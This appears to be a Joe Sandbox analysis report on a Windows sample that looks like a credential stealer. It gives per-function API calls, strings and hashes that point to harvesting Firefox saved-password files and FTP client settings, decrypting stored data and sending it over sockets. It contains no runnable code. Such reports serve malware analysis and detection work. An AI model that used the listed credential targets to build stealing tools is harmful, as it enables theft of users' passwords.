                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ($http://www.facebook.com/
                  • API String ID: 0-3677894361
                  • Opcode ID: a77bc7426e4bbf1d52fae425c0ef28d118d9cd31f72c649f5277243ff3546cb4
                  • Instruction ID: eda38bd90908fb2fe4bf241b0ddb92c058cdd20017001c82cd88152a6cc6e333
                  • Opcode Fuzzy Hash: a77bc7426e4bbf1d52fae425c0ef28d118d9cd31f72c649f5277243ff3546cb4
                  • Instruction Fuzzy Hash: 35312A70A00209EBDF109F90C889FDEFB75BF44314F248566E400762A0D3799E95DB99
                  Function 0040A0A2 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(00D33330,Odin), ref: 0040A0F4
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocal
                  • String ID: Odin$SiteInfo.QFP
                  • API String ID: 2826327444-4277389770
                  • Opcode ID: a1843a15398adeeb7cd6797b56db7c58feec452859df8b9ecfc7ef4a4995df4d
                  • Instruction ID: b385f1d911d02ba6251331f92d5f7f463674cee8683f4fcb6224a6bb79d11784
                  • Opcode Fuzzy Hash: a1843a15398adeeb7cd6797b56db7c58feec452859df8b9ecfc7ef4a4995df4d
                  • Instruction Fuzzy Hash: 2501D6706002057AEB213B21CC02FAF7E59DB82314F24413BB911B51E3D67C8E9192ED
                  Function 004075D2 Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004075E5
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407619
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040767C
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID:
                  • API String ID: 4012628704-0
                  • Opcode ID: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                  • Instruction ID: 85ca958a1271cad8174414d3164074e3ff60ec8eec34d7e66a6ef738b10b5b92
                  • Opcode Fuzzy Hash: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                  • Instruction Fuzzy Hash: 44113D3180010DBADF119F90CC41FDEBBB9BF04304F1085B6B515B01A0DB796B919F99
                  Function 00403800 Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON
                  Download Yara Rule
                  APIs
                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040380F
                  • connect.WS2_32(00000000,00000002,00000010), ref: 0040386B
                  • closesocket.WS2_32(00000000), ref: 00403876
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: closesocketconnectsocket
                  • String ID:
                  • API String ID: 643388700-0
                  • Opcode ID: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
                  • Instruction ID: 08d913eedad497c84f2e0313ceade0e14c6413b499fa458ef27ae104aaf27b56
                  • Opcode Fuzzy Hash: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
                  • Instruction Fuzzy Hash: 39018832904208AADB10BE758C85BEE769CAF00325F10CA7BB524651D1D7BCCB84D61A
                  Function 0040F3AC Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3BF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3F3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F44D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  • Opcode ID: 180b50c7a0fe4b635aa82a4e80fb3d4b877acd5006d83aa97bd0e4378460a6bc
                  • Instruction ID: 3f500d121796ae958a13cbd9a22362d9f33106e8a6ebe7f556d4116e7e1c3b80
                  • Opcode Fuzzy Hash: 180b50c7a0fe4b635aa82a4e80fb3d4b877acd5006d83aa97bd0e4378460a6bc
                  • Instruction Fuzzy Hash: 83112E3590010DBADF11AF91CC41FDE7BB9BF00704F108076B914B51E1DBB9AA94AF99
                  Function 0040F30D Relevance: 4.5, APIs: 3, Instructions: 48registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F320
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F350
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3A3
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  • Opcode ID: af32241f65d7463265b562bff7dbed8e72db6dbf3d3f3c485daa02a4d70cd35d
                  • Instruction ID: 01857da1a27ee82219c9d2f84fe8e5f9927363e823dd1e169558564d55cd5593
                  • Opcode Fuzzy Hash: af32241f65d7463265b562bff7dbed8e72db6dbf3d3f3c485daa02a4d70cd35d
                  • Instruction Fuzzy Hash: 13113031900108BADF11AF51CC01FED7B79BF00704F108176B514751E0DBB96A94AF98
                  Function 0040CB74 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CBAB
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CB8D
                  • EasyFTP, xrefs: 0040CBA3
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                  • API String ID: 1884169789-2776585315
                  • Opcode ID: 1f7c74d900153aa2d11bfb4f0bfdea96a96229626d7254e8f4731c60b7b2f845
                  • Instruction ID: bab1806491335f4f24b7019ee295fbccc29c785ca9a9eb8eda39b374d5021ed5
                  • Opcode Fuzzy Hash: 1f7c74d900153aa2d11bfb4f0bfdea96a96229626d7254e8f4731c60b7b2f845
                  • Instruction Fuzzy Hash: 94F03670580104B9EF117B61CC47FAD7E76DF10748F20457A7900741F1DAB99B91965C
                  Function 00401EB1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401EDC
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F11
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocFolderLocalPath
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 1254228173-2036018995
                  • Opcode ID: ab5710ca6b8c8761b2d451952c02884fd46b8b667e4a982dcf32cd1078de38e6
                  • Instruction ID: 685d36de43f64f97c71de81f6871cb4b42f40fe54bc8bcc0cfffed498ff1ec3e
                  • Opcode Fuzzy Hash: ab5710ca6b8c8761b2d451952c02884fd46b8b667e4a982dcf32cd1078de38e6
                  • Instruction Fuzzy Hash: 22017135A04206EBDB109F50CD02B9EB7A5EB44754F208277F501BA2E0E778AA50DB89
                  Function 00407E69 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407E8D
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                  • String ID: \32BitFtp.ini
                  • API String ID: 2776971706-1260517637
                  • Opcode ID: 2172a12cec20e8989506aa072c9d44529240a4debc3839429db8f461b9dd07ec
                  • Instruction ID: a11a2e049d2e365c2248b7b9670d3b2c2be4735807615fd35c230b82605c2c15
                  • Opcode Fuzzy Hash: 2172a12cec20e8989506aa072c9d44529240a4debc3839429db8f461b9dd07ec
                  • Instruction Fuzzy Hash: E0F0A770A00108BAEF10BBA1CC42FDE7A6DDF40744F104077B704B51E2EAB9AF809A9D
                  Function 004024D6 Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(?), ref: 004024DF
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040250D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID:
                  • API String ID: 2574300362-0
                  • Opcode ID: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                  • Instruction ID: fbc1fe3612a262e3ea9a0b223a66db08094d4ab5f536d4fd90f1adfdd8ad2806
                  • Opcode Fuzzy Hash: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                  • Instruction Fuzzy Hash: 20F09A732051142ADB106A3AAC4499B6B88E7E33B8B105137E806A62C1E5B9DD8682A8
                  Function 0040E566 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen
                  • String ID: .xml
                  • API String ID: 1659193697-2937849440
                  • Opcode ID: 401139ce8e518b5a66182d8524dd3e509ec127c3cd5639ab2dcfbf6fe49c8e38
                  • Instruction ID: 0e88fc64eb5edec90800b857d6d99b28fd0d3498d5337a762e7c0bf7a734747b
                  • Opcode Fuzzy Hash: 401139ce8e518b5a66182d8524dd3e509ec127c3cd5639ab2dcfbf6fe49c8e38
                  • Instruction Fuzzy Hash: A3F03A32D00108FADF11FBD1CC42ECDBB76AB50308F208566B621B51B0D7B99BA4EB48
                  Function 00401F36 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F62
                  • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F6F
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitHandleProcess
                  • String ID:
                  • API String ID: 1046136549-0
                  • Opcode ID: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                  • Instruction ID: ff3804100ddf8c199ee2f8612031d1c0044171ab4ec93654cd43e20a2e279d87
                  • Opcode Fuzzy Hash: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                  • Instruction Fuzzy Hash: C6E04F7235024537EB3155699C83F46258857127A8F104032B345FD2D1DAE9E9D0425C
                  Function 00401FB9 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401FC6
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401FE1
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnvironmentExpandLocalStrings$AllocFree
                  • String ID:
                  • API String ID: 2376306162-0
                  • Opcode ID: 7ce35d40b8dc15902d1d11a738015c704fa05c54261905a4e1f541725c681a4a
                  • Instruction ID: d8336d695edfc154b3b45a9711e618b47250add4b5adda8f5b079a4b1d77d4f2
                  • Opcode Fuzzy Hash: 7ce35d40b8dc15902d1d11a738015c704fa05c54261905a4e1f541725c681a4a
                  • Instruction Fuzzy Hash: 1CE0ED7190410AFAEB10BAB59D02BAE7A69AB00358F20453A7504F51E1DBB99F60A668
                  Function 004037C6 Relevance: 3.0, APIs: 2, Instructions: 22networkCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: gethostbynameinet_addr
                  • String ID:
                  • API String ID: 1594361348-0
                  • Opcode ID: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                  • Instruction ID: 5e93a2d41fda1c27195ed80854e744a6a241ee01f30d7083f3dbc766825ad624
                  • Opcode Fuzzy Hash: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                  • Instruction Fuzzy Hash: D5E04FB420440A9FCA11AE3DC8428557F987B163B93108333F130EB2F1D778D941A749
                  Function 00403850 Relevance: 3.0, APIs: 2, Instructions: 16networkCOMMON
                  Download Yara Rule
                  APIs
                  • connect.WS2_32(00000000,00000002,00000010), ref: 0040386B
                  • closesocket.WS2_32(00000000), ref: 00403876
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: closesocketconnect
                  • String ID:
                  • API String ID: 1323028321-0
                  • Opcode ID: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                  • Instruction ID: 2c0b4ed7b26df5b6c8b3ddf8a33cbfcd02c62134e5053cecd8bd2a5708bf71a2
                  • Opcode Fuzzy Hash: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                  • Instruction Fuzzy Hash: B5D0C972A042046AD700BABA5CC1EBEA69CAF10328F109A7BB526E51C2D5BCC584D629
                  Function 00410630 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  • GetTickCount.KERNEL32 ref: 0041062F
                  • ExitProcess.KERNEL32(00000000), ref: 0041064D
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountExitProcessTick
                  • String ID:
                  • API String ID: 232575682-0
                  • Opcode ID: 313bf66b5dfe05952b25d2840f572e1741d7572e0e6d598ccf12f7a4ae9acd8d
                  • Instruction ID: 1fdb523825d5533d52b5a783dd64089226d452954fd390a664e9fec20cc3f53c
                  • Opcode Fuzzy Hash: 313bf66b5dfe05952b25d2840f572e1741d7572e0e6d598ccf12f7a4ae9acd8d
                  • Instruction Fuzzy Hash: 9CD0C93075D2809AD3956762996A7EA36124BE6309F1581AFE009490938DED0AE6462F
                  Function 00403884 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                  Download Yara Rule
                  APIs
                  • send.WSOCK32(?,?,00000000,00000000), ref: 004038AB
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: send
                  • String ID:
                  • API String ID: 2809346765-0
                  • Opcode ID: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                  • Instruction ID: 7010a4d4224b84c81328f756437b4738d149add1ed75441a8268b8f5070a40e4
                  • Opcode Fuzzy Hash: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                  • Instruction Fuzzy Hash: 4BF0E533614308ABEB106E15CC40B9B3B9CEB90759F14883BF901A62C0D3BDDA958359
                  Function 00401422 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                  Download Yara Rule
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                  • Instruction ID: ffb465389c342e6fff0e154865cbb03be69b4e2e252949391933a2331f5ccebc
                  • Opcode Fuzzy Hash: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                  • Instruction Fuzzy Hash: 71E06532510119ABCF10DE689C01FDF77A8DB50358F044126F914E61E0E7B5DF50C795
                  Function 004038D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: select
                  • String ID:
                  • API String ID: 1274211008-0
                  • Opcode ID: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                  • Instruction ID: 10b725986883f22aabceafb6b3feb490bf47cb93175d073b1889671c1eb66941
                  • Opcode Fuzzy Hash: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                  • Instruction Fuzzy Hash: 59F03075500518AEDF20CF50CC81BEABBB8EB14328F1041A2E598E52D0E7F99BC48F95
                  Function 00403FFB Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                  Download Yara Rule
                  APIs
                  • WSAStartup.WS2_32(00000101,?), ref: 00404010
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Startup
                  • String ID:
                  • API String ID: 724789610-0
                  • Opcode ID: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                  • Instruction ID: 067aa5936d8b9ea5f708c86def76a5f3d8c81cd5d66f0ce82ea66d37eb38fb46
                  • Opcode Fuzzy Hash: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                  • Instruction Fuzzy Hash: BDB0923161460826EA10A2968C479D6729C4744748F4005A13A5AD12C3EBE5AAC046EA
                  Function 004018CF Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocLocal
                  • String ID:
                  • API String ID: 3494564517-0
                  • Opcode ID: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                  • Instruction ID: a02c1daf7142050e978c307995f6bc26c6b3feeb3ea3d743e520ab0cb6cfa48f
                  • Opcode Fuzzy Hash: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                  • Instruction Fuzzy Hash: 81B092B124030826E250A649C803F5A728C9B50B8CF008022BB45A6282C8A8F9A041AD
                  Function 004018B8 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocal
                  • String ID:
                  • API String ID: 2826327444-0
                  • Opcode ID: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                  • Instruction ID: 6f7800812ba96fbfdec46f28aef180318072ae253db4b629a7912724480db57a
                  • Opcode Fuzzy Hash: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                  • Instruction Fuzzy Hash: 64C09B7210050C55C7017E25C905B9A7AD8575034CF40C1356605555B5D6B8D6E4C5D8

                  Non-executed Functions

                  Function 00409832 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 004098A2
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 004098CF
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 004098EC
                  • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A82
                  • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A95
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                  • API String ID: 3040542784-1405255088
                  • Opcode ID: 79aa9d010b6a9544d2f1cbe0020f4fc9b9144494d83483410492098334957b8b
                  • Instruction ID: 12bd8378188bb7e1a7194032bae3a414b25258f4a54715fc245deb7fafbe9bd7
                  • Opcode Fuzzy Hash: 79aa9d010b6a9544d2f1cbe0020f4fc9b9144494d83483410492098334957b8b
                  • Instruction Fuzzy Hash: 4E514171941249BADF61BF61CC02EEE7A69EF41308F1080BBB408711F2D6799ED0AE5D
                  Function 00402CE7 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 105COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: explorer.exe
                  • API String ID: 0-3187896405
                  • Opcode ID: f7afdcfe744b3e05ab48eaa6f980910a938150a171169030d78f1a6cd7be30cb
                  • Instruction ID: 57b851390ac6ff9d3df1dc865e97f222bf2379d97e48b75dd5cfef461e8c138c
                  • Opcode Fuzzy Hash: f7afdcfe744b3e05ab48eaa6f980910a938150a171169030d78f1a6cd7be30cb
                  • Instruction Fuzzy Hash: 84317A30A40208AADF229BA1CD49BEE7BB4AB44344F1040B7E105B11E1DBB99FD4DF58
                  Function 0040BC36 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BCED
                  • LocalFree.KERNEL32(00000000,?), ref: 0040BD28
                  • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD69
                  • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD77
                  • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD85
                  • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD93
                  • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDA1
                  • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDAF
                  Strings
                  Memory Dump Source
